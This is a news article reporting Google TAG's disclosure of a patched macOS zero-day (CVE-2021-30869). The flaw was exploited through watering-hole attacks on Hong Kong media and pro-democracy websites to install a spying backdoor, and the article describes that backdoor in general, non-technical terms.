Google's Threat Analysis Group (TAG) determined that cybercriminals targeting visitors to Hong Kong websites potentially have been exploiting a previously unreported zero-day issue in macOS to record keystrokes and screen captures. Apple patched the problem, known as CVE-2021-30869, in September, around a month after Google researchers identified it. Apple indicated that it was made aware of claims that a bug vulnerability was in the wild and that a malicious program might utilize it to run arbitrary code with kernel privileges.
Google has also disclosed further details, stating that this was a "watering hole" assault, in which attackers choose websites to hack based on the characteristics of usual users. The cyberattacks were aimed at Mac and iPhone users.
"A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild," Apple said, crediting Google TAG researchers with reporting of the flaw.
The watering hole exploited an unpatched XNU privilege escalation vulnerability in macOS Catalina at the time, resulting in the installation of a backdoor.
"The websites leveraged for the attacks contained two iframes which served exploits from an attacker-controlled server -- one for iOS and the other for macOS," said Erye Hernandez of Google TAG.
"We believe this threat actor to be a well-resourced group, likely state-backed, with access to their own software engineering team based on the quality of the payload code," he added.
The criminals used the earlier revealed XNU flaw, CVE-2020-27932, and an associated exploit to build an escalation of privilege problem that granted them root privileges on a targeted Mac. And once attackers got root privileges, they downloaded a payload that operated silently in the backdrop on affected Macs. According to Google TAG, the malware's architecture signals a well-resourced attacker.
"The payload seems to be a product of extensive software engineering. It uses a publish-subscribe model via a Data Distribution Service (DDS) framework for communicating with the C2. It also has several components, some of which appear to be configured as modules," notes Hernandez.
The backdoor had the typical suspicious characteristics of malware designed to spy on a victim, such as device fingerprinting, screengrabs, the capacity to upload and download data, and the ability to implement terminal instructions. In addition, the spyware can record audio and track keystrokes. Google did not reveal the websites that were targeted but did mention that they included a "media outlet and a prominent pro-democracy labor and political group" relating to Hong Kong news.
